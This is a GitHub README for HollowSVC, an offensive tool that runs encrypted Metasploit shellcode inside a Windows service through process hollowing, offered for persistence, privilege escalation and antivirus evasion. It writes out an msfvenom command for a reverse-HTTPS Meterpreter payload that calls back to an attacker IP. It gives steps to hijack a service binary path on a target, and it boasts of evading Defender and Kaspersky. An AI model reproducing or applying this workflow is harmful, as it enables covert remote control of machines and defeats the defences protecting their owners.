Skip to content

Windows Service with the implementation of the Process hollowing technique to run shellcode

License

Notifications You must be signed in to change notification settings

bryanroma/HollowSVC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Logo

This program is a Windows Service that utilizes the 'process hollowing' technique to run shellcode. It requires the ROT-encrypted shellcode that the user will create using the HollowCrypt program. I created this because there were moments when I needed a custom and straightforward way to run Metasploit shellcode on a Windows Service for persistence/privilege escalation, and using common tools would trigger the AV over my binaries...

How to use it

First, we need to create our shellcode:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.147 LPORT=443 EXITFUNC=thread -f csharp

Then, edit the HollowCrypt source code , compile and execute:

HollowCrypt.exe

After that, replace the encrypted shellcode in the HollowSVC source code. Now compile the service in the arch of your target, setup your listener, hijack the binary/path in the target and run!

POC

Running service with path to HollowSVC executable:

legitsvc2

Meterpreter retrieved:

legitsvc3

Defender FUD, you will still need to implement OPSEC and be careful when launching meterpreter modules:

legitsvc4

And remember, there is always ways to improve this! (Use HTTPS cert with meterpreter, load STDAPI afterwards receiving the callback, meterpreter auto-migrate module, use dynamic shellcode encoding ,custom shellcode, etc)

Following those tips, you can bypass AVs like Kaspersky ;-)

photo_2023-07-20_22-35-40.jpg

photo_2023-07-20_22-36-35.jpg

About

Windows Service with the implementation of the Process hollowing technique to run shellcode

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages